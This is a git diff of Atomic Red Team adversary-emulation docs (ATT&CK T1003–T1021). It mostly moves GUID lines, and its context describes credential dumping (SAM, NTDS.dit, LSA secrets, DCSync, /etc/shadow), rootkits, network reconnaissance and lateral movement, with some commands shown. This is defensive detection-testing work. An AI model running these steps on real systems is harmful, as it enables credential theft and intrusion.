## Atomic Test #3 - esentutl.exe SAM copy - -auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480 - Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. + **Supported Platforms:** Windows +**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480 + + + #### Inputs: @@ -170,13 +176,15 @@ del #{copy_dest}\#{file_name} >nul 2>&1
## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames - -auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 - Executes a hashdump by reading the hasshes from the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193 + + + diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index c89af84f..a82206f8 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -30,15 +30,17 @@ The following tools and techniques can be used to enumerate the NTDS file and th
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin - -auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f + + + #### Inputs: @@ -75,9 +77,6 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy - -auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. @@ -85,9 +84,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. + **Supported Platforms:** Windows +**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03 + + + #### Inputs: @@ -151,9 +155,6 @@ mkdir #{extract_path}
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil - -auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability @@ -161,9 +162,14 @@ uses the "IFM" or "Install From Media" backup functionality that allows Active D subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723 + + + #### Inputs: @@ -205,15 +211,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #4 - Create Volume Shadow Copy with WMI - -auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da + + + #### Inputs: @@ -250,15 +258,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #5 - Create Volume Shadow Copy with Powershell - -auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24 + + + #### Inputs: @@ -283,15 +293,17 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
## Atomic Test #6 - Create Symlink to Volume Shadow Copy - -auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702 + + + #### Inputs: diff --git a/atomics/T1003.004/T1003.004.md b/atomics/T1003.004/T1003.004.md index 05973de3..15260a63 100644 --- a/atomics/T1003.004/T1003.004.md +++ b/atomics/T1003.004/T1003.004.md @@ -12,16 +12,18 @@
## Atomic Test #1 - Dumping LSA Secrets - -auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f - Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc. + **Supported Platforms:** Windows +**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f + + + #### Inputs: diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md index c6708587..c9efc3ad 100644 --- a/atomics/T1003.006/T1003.006.md +++ b/atomics/T1003.006/T1003.006.md @@ -14,16 +14,18 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
## Atomic Test #1 - DCSync - -auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e - Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729) + **Supported Platforms:** Windows +**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e + + + #### Inputs: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index 99420fb6..d2d5875d 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -14,14 +14,16 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
## Atomic Test #1 - Dump individual process memory with sh (Local) - -auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 - Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. + **Supported Platforms:** Linux +**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80 + + + #### Inputs: @@ -73,14 +75,16 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa
## Atomic Test #2 - Dump individual process memory with Python (Local) - -auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 - Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. + **Supported Platforms:** Linux +**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63 + + + #### Inputs: diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md index fb75bbaa..496d6d4c 100644 --- a/atomics/T1003.008/T1003.008.md +++ b/atomics/T1003.008/T1003.008.md @@ -15,13 +15,15 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
## Atomic Test #1 - Access /etc/shadow (Local) - -auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 - /etc/shadow file is accessed in Linux environments + **Supported Platforms:** Linux +**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235 + + + #### Inputs: @@ -51,13 +53,15 @@ rm -f #{output_file}
## Atomic Test #2 - Access /etc/passwd (Local) - -auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d - /etc/passwd file is accessed in Linux environments + **Supported Platforms:** Linux +**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d + + + #### Inputs: diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 8b9193ca..f7c73c92 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -15,9 +15,6 @@ Several of the tools mentioned in associated sub-techniques may be used by both
## Atomic Test #1 - Gsecdump - -auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9 - Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's following by two 32 characters hashes. @@ -26,9 +23,14 @@ If you see output that says "compat: error: failed to create child process", exe You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first. + **Supported Platforms:** Windows +**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9 + + + #### Inputs: @@ -72,16 +74,18 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
## Atomic Test #2 - Credential Dumping with NPPSpy - -auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 - Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy + **Supported Platforms:** Windows +**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 + + + diff --git a/atomics/T1006/T1006.md b/atomics/T1006/T1006.md index 203a2b06..19a34276 100644 --- a/atomics/T1006/T1006.md +++ b/atomics/T1006/T1006.md @@ -12,9 +12,6 @@ Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Cit
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell) - -auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b - This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. @@ -24,9 +21,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti 00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS ``` + **Supported Platforms:** Windows +**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b + + + #### Inputs: diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index 7cb3c441..faff45d6 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -12,15 +12,17 @@
## Atomic Test #1 - System Service Discovery - -auto_generated_guid: 89676ba1-b1f8-47ee-b940-2e1a113ebc71 - Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71 + + + @@ -42,15 +44,17 @@ sc query state= all
## Atomic Test #2 - System Service Discovery - net.exe - -auto_generated_guid: 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 - Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s + **Supported Platforms:** Windows +**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 + + + #### Inputs: diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index e706e035..8655b46f 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -10,15 +10,17 @@
## Atomic Test #1 - List Process Main Windows - C# .NET - -auto_generated_guid: fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 - Compiles and executes C# code to list main window titles associated with each process. Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 + + + #### Inputs: diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md index 650fef02..272ee9ac 100644 --- a/atomics/T1012/T1012.md +++ b/atomics/T1012/T1012.md @@ -12,9 +12,6 @@ The Registry contains a significant amount of information about the operating sy
## Atomic Test #1 - Query Registry - -auto_generated_guid: 8f7578c4-9863-4d83-875c-a565573bbdf0 - Query Windows Registry. Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). References: @@ -22,9 +19,14 @@ https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-se https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf + **Supported Platforms:** Windows +**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0 + + + diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 62b1a33f..43f2a795 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -16,13 +16,15 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
## Atomic Test #1 - Loadable Kernel Module based Rootkit - -auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 - Loadable Kernel Module based Rootkit + **Supported Platforms:** Linux +**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553 + + + #### Inputs: @@ -70,13 +72,15 @@ mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
## Atomic Test #2 - Loadable Kernel Module based Rootkit - -auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f - Loadable Kernel Module based Rootkit + **Supported Platforms:** Linux +**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f + + + #### Inputs: @@ -127,9 +131,6 @@ sudo depmod -a
## Atomic Test #3 - Windows Signed Driver Rootkit Test - -auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae - This test exploits a signed driver to execute code in Kernel. This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html @@ -139,9 +140,14 @@ https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.htm The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process. + **Supported Platforms:** Windows +**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae + + + #### Inputs: diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index fcc7fb8d..35bd3edd 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -26,15 +26,17 @@ Adversaries may use the information from [System Network Configuration Discovery
## Atomic Test #1 - System Network Configuration Discovery on Windows - -auto_generated_guid: 970ab6a1-0157-4f3f-9a73-ec4166754b23 - Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23 + + + @@ -58,15 +60,17 @@ net config
## Atomic Test #2 - List Windows Firewall Rules - -auto_generated_guid: 038263cb-00f4-4b0a-98ae-0696c67e1752 - Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752 + + + @@ -86,15 +90,17 @@ netsh advfirewall firewall show rule name=all
## Atomic Test #3 - System Network Configuration Discovery - -auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 - Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17 + + + @@ -117,15 +123,17 @@ if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style) - -auto_generated_guid: dafaf052-5508-402d-bf77-51e0700c02e2 - Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2 + + + @@ -148,16 +156,18 @@ nltest /domain_trusts
## Atomic Test #5 - List Open Egress Ports - -auto_generated_guid: 4b467538-f102-491d-ace7-ed487b853bf5 - This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt. + **Supported Platforms:** Windows +**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5 + + + #### Inputs: @@ -226,14 +236,16 @@ Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects - -auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee + + + #### Inputs: @@ -270,13 +282,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #7 - Qakbot Recon - -auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b - A list of commands known to be performed by Qakbot for recon purposes + **Supported Platforms:** Windows +**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b + + + #### Inputs: @@ -301,17 +315,19 @@ A list of commands known to be performed by Qakbot for recon purposes
## Atomic Test #8 - List macOS Firewall Rules - -auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88 - "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. + **Supported Platforms:** macOS +**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88 + + + diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index 2f288279..5d28a39a 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -32,15 +32,17 @@ Specific to macOS, the bonjour protocol exists to discover addition
## Atomic Test #1 - Remote System Discovery - net - -auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd - Identify remote systems with net.exe. Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled. + **Supported Platforms:** Windows +**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd + + + @@ -61,15 +63,17 @@ net view
## Atomic Test #2 - Remote System Discovery - net group Domain Computers - -auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f - Identify remote systems with net.exe querying the Active Directory Domain Computers group. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f + + + @@ -89,15 +93,17 @@ net group "Domain Computers" /domain
## Atomic Test #3 - Remote System Discovery - nltest - -auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 - Identify domain controllers for specified domain. Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 + + + #### Inputs: @@ -122,15 +128,17 @@ nltest.exe /dclist:#{target_domain}
## Atomic Test #4 - Remote System Discovery - ping sweep - -auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 - Identify remote systems via ping sweep. Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592 + + + @@ -150,15 +158,17 @@ for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
## Atomic Test #5 - Remote System Discovery - arp - -auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 - Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574 + + + @@ -178,15 +188,17 @@ arp -a
## Atomic Test #6 - Remote System Discovery - arp nix - -auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 - Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951 + + + @@ -218,15 +230,17 @@ echo "Install arp on the machine."; exit 1;
## Atomic Test #7 - Remote System Discovery - sweep - -auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de - Identify remote systems via ping sweep. Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de + + + #### Inputs: @@ -253,15 +267,17 @@ for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -e
## Atomic Test #8 - Remote System Discovery - nslookup - -auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f - Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig. Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f + + + @@ -286,15 +302,17 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.
## Atomic Test #9 - Remote System Discovery - adidnsdump - -auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959 - This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will list dns zones in the terminal. + **Supported Platforms:** Windows +**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959 + + + #### Inputs: @@ -351,14 +369,16 @@ pip3 install adidnsdump
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects - -auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4 + + + #### Inputs: @@ -395,14 +415,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects - -auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e + + + #### Inputs: diff --git a/atomics/T1020/T1020.md b/atomics/T1020/T1020.md index f7ba85be..3c62c9dd 100644 --- a/atomics/T1020/T1020.md +++ b/atomics/T1020/T1020.md @@ -12,15 +12,17 @@ When automated exfiltration is used, other exfiltration techniques likely apply
## Atomic Test #1 - IcedID Botnet HTTP PUT - -auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 - Creates a text file Tries to upload to a server via HTTP PUT method with ContentType Header Deletes a created file + **Supported Platforms:** Windows +**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 + + + #### Inputs: diff --git a/atomics/T1021.001/T1021.001.md b/atomics/T1021.001/T1021.001.md index 93c50921..1d647cd1 100644 --- a/atomics/T1021.001/T1021.001.md +++ b/atomics/T1021.001/T1021.001.md @@ -16,13 +16,15 @@ Adversaries may connect to a remote system over RDP/RDS to expand access if the
## Atomic Test #1 - RDP to DomainController - -auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e - Attempt an RDP session via Remote Desktop Application to a DomainController. + **Supported Platforms:** Windows +**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e + + + #### Inputs: @@ -72,13 +74,15 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - RDP to Server - -auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b - Attempt an RDP session via Remote Desktop Application over Powershell + **Supported Platforms:** Windows +**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b + + + #### Inputs: diff --git a/atomics/T1021.002/T1021.002.md b/atomics/T1021.002/T1021.002.md index f772ec3d..6cfb82c9 100644 --- a/atomics/T1021.002/T1021.002.md +++ b/atomics/T1021.002/T1021.002.md @@ -20,13 +20,15 @@ Windows systems have hidden network shares that are accessible only to administr
## Atomic Test #1 - Map admin share - -auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 - Connecting To Remote Shares + **Supported Platforms:** Windows +**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3 + + + #### Inputs: @@ -54,13 +56,15 @@ cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}
## Atomic Test #2 - Map Admin Share PowerShell - -auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 - Map Admin share utilizing PowerShell + **Supported Platforms:** Windows +**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5 + + + #### Inputs: @@ -87,13 +91,15 @@ New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{
## Atomic Test #3 - Copy and Execute File with PsExec - -auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf - Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). + **Supported Platforms:** Windows +**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf + + + #### Inputs: @@ -135,14 +141,16 @@ Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
## Atomic Test #4 - Execute command writing output to local Admin Share - -auto_generated_guid: d41aaab5-bdfe-431d-a3d5-c29e9136ff46 - Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks. + **Supported Platforms:** Windows +**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46 + + + #### Inputs: diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md index d197e64c..a51150c8 100644 --- a/atomics/T1021.003/T1021.003.md +++ b/atomics/T1021.003/T1021.003.md @@ -16,9 +16,6 @@ Through DCOM, adversaries operating in the context of an appropriately privilege
## Atomic Test #1 - PowerShell Lateral Movement using MMC20 - -auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 - Powershell lateral movement using the mmc20 application com object. Reference: @@ -26,9 +23,14 @@ Reference: https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ Upon successful execution, cmd will spawn calc.exe on a remote computer. + **Supported Platforms:** Windows +**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 + + + #### Inputs: diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md index a5fb4f0d..4a0d0636 100644 --- a/atomics/T1021.006/T1021.006.md +++ b/atomics/T1021.006/T1021.006.md @@ -16,15 +16,17 @@ WinRM is the name of both a Windows service and a protocol that allows a user to
## Atomic Test #1 - Enable Windows Remote Management - -auto_generated_guid: 9059e8de-3d7d-4954-a322-46161880b9cf - Powershell Enable WinRM Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. + **Supported Platforms:** Windows +**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf + + + @@ -44,15 +46,17 @@ Enable-PSRemoting -Force
## Atomic Test #2 - Invoke-Command - -auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 - Execute Invoke-command on remote host. Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. + **Supported Platforms:** Windows +**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6 + + + #### Inputs: @@ -78,13 +82,15 @@ invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
